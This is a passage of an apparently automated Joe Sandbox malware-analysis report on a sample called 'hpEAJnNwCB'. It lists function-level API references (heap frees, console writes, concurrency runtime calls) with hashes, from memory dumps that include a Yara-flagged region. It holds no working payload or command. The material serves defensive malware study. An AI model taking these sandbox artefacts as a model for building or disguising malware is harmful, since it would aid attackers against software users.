  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 00431E06
• _free.LIBCMT ref: 00431E11
• _free.LIBCMT ref: 00431E1C
• _free.LIBCMT ref: 00431E27
• _free.LIBCMT ref: 00431E32
• _free.LIBCMT ref: 00431E3D
• _free.LIBCMT ref: 00431E48
• _free.LIBCMT ref: 00431E53
• _free.LIBCMT ref: 00431E61
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
• Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: __cftoe
• String ID: F(@$F(@
• API String ID: 4189289331-2038261262
• Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
• Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
• Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: c01345a6aba6f99cc68671fc9a445fcd6e03ffdfd8eb45b103531f9227e7a0b5
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction Fuzzy Hash: 54C1E278E04245ABCB52DFADC840BEEBFB5AF09304F6481DEE814AB391C7709941CB65
APIs
• _ValidateLocalCookies.LIBCMT ref: 004286FB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
• _ValidateLocalCookies.LIBCMT ref: 00428791
• __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
• _ValidateLocalCookies.LIBCMT ref: 00428811
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: fB$csm
• API String ID: 1170836740-1586063737
• Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
• Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
• PMDtoOffset.LIBCMT ref: 00428D4F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                            • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                            • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                            • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                            • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • atomic_compare_exchange.LIBCONCRT ref: 024AC6DC
                                                                                                                                                                                                                                            • atomic_compare_exchange.LIBCONCRT ref: 024AC700
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC711
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC71F
                                                                                                                                                                                                                                              • Part of subcall function 02491370: __Mtx_unlock.LIBCPMT ref: 02491377
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC72F
                                                                                                                                                                                                                                              • Part of subcall function 024AC3EF: __Cnd_broadcast.LIBCPMT ref: 024AC3F6
                                                                                                                                                                                                                                            • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024AC73D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                            • String ID: t#D
                                                                                                                                                                                                                                            • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                            • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                            • Instruction ID: a540ffa58f75eb57f18687293ca5bbf1f46a396b577690c6308ad402697d5fd8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C01F775900605A7DF11B762CD95B9EB76ABF10310F14001BE80997780DBB4AA158FD2
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                              • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3864826663-0
                                                                                                                                                                                                                                            • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                            • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C1444
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C145D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C148F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C1498
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C14A4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                            • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                            • Instruction ID: 0174e17bd8256397e2bb95e95aa0b9571352f9f89f873a19963941fa4aa1829d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14B12679A012199BDB65DF18C884BAEB7B5FB48304F2085AED84DA7351D770AE90CF80
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                            • Instruction ID: 5951c86e5e6e204d0ee8af657f033095aff449d5c3a18a4a25b5e6a03ac25a25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB61E179A00229AFDBA0DF6DC841B9ABBF5EB44710F3441AFE844EB345D771A941CB90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
• Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
APIs
• GetConsoleCP.KERNEL32(?,024BC4A4,E0830C40,?,?,?,?,?,?,024C425F,0249E03C,024BC4A4,?,024BC4A4,024BC4A4,0249E03C), ref: 024C3B2C
• __fassign.LIBCMT ref: 024C3BA7
• __fassign.LIBCMT ref: 024C3BC2
• WideCharToMultiByte.KERNEL32(?,00000000,024BC4A4,00000001,?,00000005,00000000,00000000), ref: 024C3BE8
• WriteFile.KERNEL32(?,?,00000000,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C07
• WriteFile.KERNEL32(?,0249E03C,00000001,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C40
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction ID: 62546ae6c4c06f584debaa7933d804e032d36d239a92dff931377c6f7ae1bd3e
• Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction Fuzzy Hash: 8451D7759002099FDB10CFA9D884AEEBBF4EF09704F24815FE555E7291E7309681CF65
APIs
• GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
• __fassign.LIBCMT ref: 00433940
• __fassign.LIBCMT ref: 0043395B
• WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
• WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
• WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
• Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024B4ACD
  • Part of subcall function 024B4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024B4800), ref: 024B4DAC
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024B4AE2
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4AF1
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B4AFF
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024B4B75
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4BB5
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B4BC3
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID:
• API String ID: 3151764488-0
• Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction ID: a628bbbd2d348ce29d9d0df7e48769a6e4244e10d226924f0f8b5281cf18a5be
• Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction Fuzzy Hash: 8831EA39A002149BCF06EF69C8A1BAE73B9FF45710F20456BD91597342DB70DE01DBA4
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction ID: 0712ba03e109f8226f459bfa4cec96e6b59cc2fe8c8c847ce00823193b087448
• Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction Fuzzy Hash: A511B739704115BBDB612F7ACC489AB7A6EEF82721B21061FFC16D7240DB348845DAB0
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
• Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
APIs
  • Part of subcall function 024CA331: _free.LIBCMT ref: 024CA35A
• _free.LIBCMT ref: 024CA638
  • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
  • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
• _free.LIBCMT ref: 024CA643
• _free.LIBCMT ref: 024CA64E
• _free.LIBCMT ref: 024CA6A2
• _free.LIBCMT ref: 024CA6AD
• _free.LIBCMT ref: 024CA6B8
• _free.LIBCMT ref: 024CA6C3
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: d60e3b10f5a541f1e3c712431f81d847c3e58f04d546d41ca474a2eb30efb138
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: 6B11B4B5605B18AADEB0BF77CC55FCF7B9EDF00700F50482EA299AA160D6A4B4114F40
APIs
  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
• _free.LIBCMT ref: 0043A3D1
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A2667
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A266D
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A269A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26A4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26B6
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A26CC
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A26DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4227777306-0
                                                                                                                                                                                                                                            • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                            • Instruction ID: 0e8d175086ac41bcc4a545e07c95b9ab4c1cc92e552ad1b8c15ade6ff792488d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A01A735502115A7D720FF6AEC58FAF376CAF52F52B50042BF805D2160EBA4D9449AB8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4227777306-0
                                                                                                                                                                                                                                            • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                            • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
